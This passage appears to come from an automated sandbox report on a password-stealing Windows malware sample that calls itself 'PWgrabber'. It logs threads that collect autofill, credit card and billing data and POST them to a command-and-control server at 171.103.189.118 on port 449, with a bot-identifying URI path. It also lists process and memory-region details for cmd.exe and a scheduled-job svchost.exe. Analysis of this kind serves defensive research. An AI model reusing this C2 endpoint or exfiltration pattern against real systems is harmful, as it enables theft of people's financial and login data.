cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="info", lpUsedDefaultChar=0x0) returned 5 [0180.732] WinHttpOpenRequest (hConnect=0x338c83d0, pwszVerb="POST", pwszObjectName="tot153/XC64ZB_W10010586.FDB33F77971735B3BB3BB3B3B33B3B93/64/pwgrabb/DPST//", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x800000) returned 0x3396e250 [0180.733] WinHttpSetOption (hInternet=0x3396e250, dwOption=0x1f, lpBuffer=0x345aedb8, dwBufferLength=0x4) returned 1 [0180.733] WinHttpSendRequest (hRequest=0x3396e250, lpszHeaders="Content-Type: multipart/form-data; boundary=------Boundary00E96B10\r\nContent-Length: 131\r\n\r\n", dwHeadersLength=0xffffffff, lpOptional=0x32e50080*, dwOptionalLength=0x83, dwTotalLength=0x83, dwContext=0x0) returned 1 [0182.273] WinHttpReceiveResponse (hRequest=0x3396e250, lpReserved=0x0) returned 1 [0182.273] WinHttpQueryHeaders (in: hRequest=0x3396e250, dwInfoLevel=0x20000013, pwszName=0x0, lpBuffer=0x345aedb4, lpdwBufferLength=0x345aedbc, lpdwIndex=0x0 | out: lpBuffer=0x345aedb4*, lpdwBufferLength=0x345aedbc*=0x4, lpdwIndex=0x0) returned 1 [0182.273] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e706e0 | out: hHeap=0x2150000) returned 1 [0182.273] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x3234bdb0 | out: hHeap=0x2150000) returned 1 [0182.273] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e70710 | out: hHeap=0x2150000) returned 1 [0182.273] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e706b0 | out: hHeap=0x2150000) returned 1 [0182.273] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e772c0 | out: hHeap=0x2150000) returned 1 [0182.273] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e50080 | out: hHeap=0x2150000) returned 1 [0182.273] Sleep (dwMilliseconds=0xbb8) [0185.955] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x3234b990 | out: hHeap=0x2150000) returned 1 [0185.955] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e65dd0 | out: hHeap=0x2150000) returned 1 [0185.955] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x3234b9b0 | out: hHeap=0x2150000) returned 1 [0185.955] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e70650 | out: hHeap=0x2150000) returned 1 [0185.955] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e783a0 | out: hHeap=0x2150000) returned 1 [0185.955] WinHttpCloseHandle (hInternet=0x3396e250) returned 1 [0185.956] WinHttpCloseHandle (hInternet=0x338c83d0) returned 1 [0185.956] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e70680 | out: hHeap=0x2150000) returned 1 Thread: id = 117 os_tid = 0xed0 [0180.778] WinHttpConnect (hSession=0x71b780, pswzServerName="171.103.189.118", nServerPort=0x1c1, dwReserved=0x0) returned 0x338c9ff0 [0180.778] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e70d40 [0180.778] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Failed to grab autofill data: ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0180.778] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e70c80 [0180.778] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Failed to grab autofill data: ", cchWideChar=-1, lpMultiByteStr=0x32e70c80, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Failed to grab autofill data: ", lpUsedDefaultChar=0x0) returned 31 [0180.778] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e71070 [0180.778] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x10) returned 0x32e49fa0 [0180.778] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e70ef0 [0180.779] GetTickCount () returned 0xe96b30 [0180.779] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x100) returned 0x32e773d0 [0180.779] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x90) returned 0x32e65510 [0180.779] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="info", cchWideChar=-1, lpMultiByteStr=0x3462e750, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="info", lpUsedDefaultChar=0x0) returned 5 [0180.779] WinHttpOpenRequest (hConnect=0x338c9ff0, pwszVerb="POST", pwszObjectName="tot153/XC64ZB_W10010586.FDB33F77971735B3BB3BB3B3B33B3B93/64/pwgrabb/DPST//", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x800000) returned 0x3396aa10 [0180.779] WinHttpSetOption (hInternet=0x3396aa10, dwOption=0x1f, lpBuffer=0x3462edb8, dwBufferLength=0x4) returned 1 [0180.779] WinHttpSendRequest (hRequest=0x3396aa10, lpszHeaders="Content-Type: multipart/form-data; boundary=------Boundary00E96B30\r\nContent-Length: 135\r\n\r\n", dwHeadersLength=0xffffffff, lpOptional=0x32e65510*, dwOptionalLength=0x87, dwTotalLength=0x87, dwContext=0x0) returned 1 [0183.708] WinHttpReceiveResponse (hRequest=0x3396aa10, lpReserved=0x0) returned 1 [0183.708] WinHttpQueryHeaders (in: hRequest=0x3396aa10, dwInfoLevel=0x20000013, pwszName=0x0, lpBuffer=0x3462edb4, lpdwBufferLength=0x3462edbc, lpdwIndex=0x0 | out: lpBuffer=0x3462edb4*, lpdwBufferLength=0x3462edbc*=0x4, lpdwIndex=0x0) returned 1 [0183.708] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e71070 | out: hHeap=0x2150000) returned 1 [0183.709] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e49fa0 | out: hHeap=0x2150000) returned 1 [0183.709] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e70ef0 | out: hHeap=0x2150000) returned 1 [0183.709] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e70c80 | out: hHeap=0x2150000) returned 1 [0183.709] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e773d0 | out: hHeap=0x2150000) returned 1 [0183.709] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e65510 | out: hHeap=0x2150000) returned 1 [0183.709] Sleep (dwMilliseconds=0xbb8) [0186.723] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e49e40 | out: hHeap=0x2150000) returned 1 [0186.723] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e50120 | out: hHeap=0x2150000) returned 1 [0186.723] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x3234b9d0 | out: hHeap=0x2150000) returned 1 [0186.723] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e708f0 | out: hHeap=0x2150000) returned 1 [0186.723] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e78360 | out: hHeap=0x2150000) returned 1 [0186.723] WinHttpCloseHandle (hInternet=0x3396aa10) returned 1 [0186.723] WinHttpCloseHandle (hInternet=0x338c9ff0) returned 1 [0186.723] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e70d40 | out: hHeap=0x2150000) returned 1 Thread: id = 118 os_tid = 0x66c [0180.802] WinHttpConnect (hSession=0x71b780, pswzServerName="171.103.189.118", nServerPort=0x1c1, dwReserved=0x0) returned 0x338ca180 [0180.802] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e71010 [0180.802] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Failed to grab credit card data: ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 34 [0180.802] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e78420 [0180.802] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Failed to grab credit card data: ", cchWideChar=-1, lpMultiByteStr=0x32e78420, cbMultiByte=34, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Failed to grab credit card data: ", lpUsedDefaultChar=0x0) returned 34 [0180.802] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e77960 [0180.803] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x10) returned 0x32e80af0 [0180.803] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e710a0 [0180.803] GetTickCount () returned 0xe96b4f [0180.803] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x100) returned 0x32e774e0 [0180.803] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x90) returned 0x32e816c0 [0180.803] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="info", cchWideChar=-1, lpMultiByteStr=0x347ae750, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="info", lpUsedDefaultChar=0x0) returned 5 [0180.803] WinHttpOpenRequest (hConnect=0x338ca180, pwszVerb="POST", pwszObjectName="tot153/XC64ZB_W10010586.FDB33F77971735B3BB3BB3B3B33B3B93/64/pwgrabb/DPST//", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x800000) returned 0x3396add0 [0180.803] WinHttpSetOption (hInternet=0x3396add0, dwOption=0x1f, lpBuffer=0x347aedb8, dwBufferLength=0x4) returned 1 [0180.803] WinHttpSendRequest (hRequest=0x3396add0, lpszHeaders="Content-Type: multipart/form-data; boundary=------Boundary00E96B4F\r\nContent-Length: 138\r\n\r\n", dwHeadersLength=0xffffffff, lpOptional=0x32e816c0*, dwOptionalLength=0x8a, dwTotalLength=0x8a, dwContext=0x0) returned 1 [0183.704] WinHttpReceiveResponse (hRequest=0x3396add0, lpReserved=0x0) returned 1 [0183.704] WinHttpQueryHeaders (in: hRequest=0x3396add0, dwInfoLevel=0x20000013, pwszName=0x0, lpBuffer=0x347aedb4, lpdwBufferLength=0x347aedbc, lpdwIndex=0x0 | out: lpBuffer=0x347aedb4*, lpdwBufferLength=0x347aedbc*=0x4, lpdwIndex=0x0) returned 1 [0183.704] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e77960 | out: hHeap=0x2150000) returned 1 [0183.705] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80af0 | out: hHeap=0x2150000) returned 1 [0183.705] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e710a0 | out: hHeap=0x2150000) returned 1 [0183.705] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e78420 | out: hHeap=0x2150000) returned 1 [0183.705] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e774e0 | out: hHeap=0x2150000) returned 1 [0183.705] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e816c0 | out: hHeap=0x2150000) returned 1 [0183.705] Sleep (dwMilliseconds=0xbb8) [0186.721] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80fd0 | out: hHeap=0x2150000) returned 1 [0186.721] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e65e20 | out: hHeap=0x2150000) returned 1 [0186.722] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80fb0 | out: hHeap=0x2150000) returned 1 [0186.722] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e70c20 | out: hHeap=0x2150000) returned 1 [0186.722] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e781a0 | out: hHeap=0x2150000) returned 1 [0186.722] WinHttpCloseHandle (hInternet=0x3396add0) returned 1 [0186.722] WinHttpCloseHandle (hInternet=0x338ca180) returned 1 [0186.722] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e71010 | out: hHeap=0x2150000) returned 1 Thread: id = 119 os_tid = 0x780 [0181.295] WinHttpConnect (hSession=0x71b780, pswzServerName="171.103.189.118", nServerPort=0x1c1, dwReserved=0x0) returned 0x338c8560 [0181.295] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6ff90 [0181.296] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Failed to grab billing info data: ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0181.296] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e78460 [0181.296] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Failed to grab billing info data: ", cchWideChar=-1, lpMultiByteStr=0x32e78460, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Failed to grab billing info data: ", lpUsedDefaultChar=0x0) returned 35 [0181.296] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e779a0 [0181.296] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x10) returned 0x32e80b10 [0181.296] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e70140 [0181.296] GetTickCount () returned 0xe96d43 [0181.296] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x100) returned 0x32e76820 [0181.296] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x90) returned 0x32e81bc0 [0181.296] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="info", cchWideChar=-1, lpMultiByteStr=0x3482e750, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="info", lpUsedDefaultChar=0x0) returned 5 [0181.296] WinHttpOpenRequest (hConnect=0x338c8560, pwszVerb="POST", pwszObjectName="tot153/XC64ZB_W10010586.FDB33F77971735B3BB3BB3B3B33B3B93/64/pwgrabb/DPST//", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x800000) returned 0x3396c450 [0181.297] WinHttpSetOption (hInternet=0x3396c450, dwOption=0x1f, lpBuffer=0x3482edb8, dwBufferLength=0x4) returned 1 [0181.297] WinHttpSendRequest (hRequest=0x3396c450, lpszHeaders="Content-Type: multipart/form-data; boundary=------Boundary00E96D43\r\nContent-Length: 139\r\n\r\n", dwHeadersLength=0xffffffff, lpOptional=0x32e81bc0*, dwOptionalLength=0x8b, dwTotalLength=0x8b, dwContext=0x0) returned 1 [0181.906] WinHttpReceiveResponse (hRequest=0x3396c450, lpReserved=0x0) returned 1 [0181.906] WinHttpQueryHeaders (in: hRequest=0x3396c450, dwInfoLevel=0x20000013, pwszName=0x0, lpBuffer=0x3482edb4, lpdwBufferLength=0x3482edbc, lpdwIndex=0x0 | out: lpBuffer=0x3482edb4*, lpdwBufferLength=0x3482edbc*=0x4, lpdwIndex=0x0) returned 1 [0181.906] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e779a0 | out: hHeap=0x2150000) returned 1 [0181.906] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80b10 | out: hHeap=0x2150000) returned 1 [0181.906] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e70140 | out: hHeap=0x2150000) returned 1 [0181.906] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e78460 | out: hHeap=0x2150000) returned 1 [0181.906] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e76820 | out: hHeap=0x2150000) returned 1 [0181.907] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e81bc0 | out: hHeap=0x2150000) returned 1 [0181.907] Sleep (dwMilliseconds=0xbb8) [0185.913] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e81070 | out: hHeap=0x2150000) returned 1 [0185.913] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e655b0 | out: hHeap=0x2150000) returned 1 [0185.914] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80cd0 | out: hHeap=0x2150000) returned 1 [0185.914] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e714c0 | out: hHeap=0x2150000) returned 1 [0185.914] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e778e0 | out: hHeap=0x2150000) returned 1 [0185.914] WinHttpCloseHandle (hInternet=0x3396c450) returned 1 [0185.914] WinHttpCloseHandle (hInternet=0x338c8560) returned 1 [0185.914] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6ff90 | out: hHeap=0x2150000) returned 1 Thread: id = 135 os_tid = 0x9e8 [0186.992] WinHttpConnect (hSession=0x71b780, pswzServerName="171.103.189.118", nServerPort=0x1c1, dwReserved=0x0) returned 0x338c9e60 [0186.992] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e87e10 [0186.992] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PWgrabber build Aug 31 2021 14:48:44", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0186.992] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64df0 [0186.992] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PWgrabber build Aug 31 2021 14:48:44", cchWideChar=-1, lpMultiByteStr=0x32e64df0, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PWgrabber build Aug 31 2021 14:48:44", lpUsedDefaultChar=0x0) returned 37 [0186.992] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64cb0 [0186.992] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x10) returned 0x32e80fb0 [0186.992] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e876f0 [0186.992] GetTickCount () returned 0xe9838a [0186.992] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x100) returned 0x32e772c0 [0186.992] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x90) returned 0x32e814e0 [0186.992] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="info", cchWideChar=-1, lpMultiByteStr=0x348ae750, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="info", lpUsedDefaultChar=0x0) returned 5 [0186.992] WinHttpOpenRequest (hConnect=0x338c9e60, pwszVerb="POST", pwszObjectName="tot153/XC64ZB_W10010586.FDB33F77971735B3BB3BB3B3B33B3B93/64/pwgrabc/VERS//", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x800000) returned 0x3396dad0 [0186.992] WinHttpSetOption (hInternet=0x3396dad0, dwOption=0x1f, lpBuffer=0x348aedb8, dwBufferLength=0x4) returned 1 [0186.993] WinHttpSendRequest (hRequest=0x3396dad0, lpszHeaders="Content-Type: multipart/form-data; boundary=------Boundary00E9838A\r\nContent-Length: 141\r\n\r\n", dwHeadersLength=0xffffffff, lpOptional=0x32e814e0*, dwOptionalLength=0x8d, dwTotalLength=0x8d, dwContext=0x0) returned 1 [0187.594] WinHttpReceiveResponse (hRequest=0x3396dad0, lpReserved=0x0) returned 1 [0187.594] WinHttpQueryHeaders (in: hRequest=0x3396dad0, dwInfoLevel=0x20000013, pwszName=0x0, lpBuffer=0x348aedb4, lpdwBufferLength=0x348aedbc, lpdwIndex=0x0 | out: lpBuffer=0x348aedb4*, lpdwBufferLength=0x348aedbc*=0x4, lpdwIndex=0x0) returned 1 [0187.594] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64cb0 | out: hHeap=0x2150000) returned 1 [0187.594] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80fb0 | out: hHeap=0x2150000) returned 1 [0187.594] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e876f0 | out: hHeap=0x2150000) returned 1 [0187.594] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64df0 | out: hHeap=0x2150000) returned 1 [0187.594] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e772c0 | out: hHeap=0x2150000) returned 1 [0187.594] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e814e0 | out: hHeap=0x2150000) returned 1 [0187.594] Sleep (dwMilliseconds=0xbb8) [0190.614] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e72340 | out: hHeap=0x2150000) returned 1 [0190.614] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80f30 | out: hHeap=0x2150000) returned 1 [0190.614] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e86490 | out: hHeap=0x2150000) returned 1 [0190.614] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64f30 | out: hHeap=0x2150000) returned 1 [0190.615] WinHttpCloseHandle (hInternet=0x3396dad0) returned 1 [0190.615] WinHttpCloseHandle (hInternet=0x338c9e60) returned 1 [0190.615] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e87e10 | out: hHeap=0x2150000) returned 1 Process: id = "3" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x6098a000" os_pid = "0xb8c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xe6c" cmd_line = "C:\\Windows\\system32\\cmd.exe" cur_dir = "C:\\Windows\\system32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f142" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 365 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 366 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 367 start_va = 0x50000 end_va = 0x14ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 368 start_va = 0x150000 end_va = 0x153fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000150000" filename = "" Region: id = 369 start_va = 0x160000 end_va = 0x160fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000160000" filename = "" Region: id = 370 start_va = 0x170000 end_va = 0x171fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 371 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 372 start_va = 0x400000 end_va = 0x5fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 373 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 374 start_va = 0x7df5fffc0000 end_va = 0x7df5fffe2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5fffc0000" filename = "" Region: id = 375 start_va = 0x7df5ffff0000 end_va = 0x7ff5fffeffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffff0000" filename = "" Region: id = 376 start_va = 0x7ff765ce0000 end_va = 0x7ff765d39fff monitored = 1 entry_point = 0x7ff765cf53f0 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 377 start_va = 0x7ffb28b00000 end_va = 0x7ffb28cc0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Thread: id = 4 os_tid = 0xcf0 Process: id = "4" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x7369f000" os_pid = "0x60" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "created_scheduled_job" parent_id = "2" os_parent_pid = "0x218" cmd_line = "C:\\Windows\\system32\\svchost.exe -k netsvcs" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xe], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\DcpSvc" [0xa], "NT SERVICE\\dmwappushservice" [0xa], "NT SERVICE\\DoSvc" [0xa], "NT SERVICE\\DsmSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xa], "NT SERVICE\\LanmanServer" [0xa], "NT SERVICE\\lfsvc" [0xa], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\NcaSvc" [0xa], "NT SERVICE\\NetSetupSvc" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\RetailDemo" [0xa], "NT SERVICE\\Schedule" [0xa], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xa], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xa], "NT SERVICE\\UsoSvc" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xa], "NT SERVICE\\wlidsvc" [0xa], "NT SERVICE\\wuauserv" [0xa], "NT SERVICE\\XboxNetApiSvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000cdd2" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Region: id = 484 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 485 start_va = 0x20000 end_va = 0x21fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 486 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 487 start_va = 0x50000 end_va = 0xcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 488 start_va = 0xd0000 end_va = 0xd3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 489 start_va = 0xe0000 end_va = 0xe0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 490 start_va = 0xf0000 end_va = 0xf1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 491 start_va = 0x100000 end_va = 0x1bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 492 start_va = 0x1c0000 end_va = 0x1c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 493 start_va = 0x1d0000 end_va = 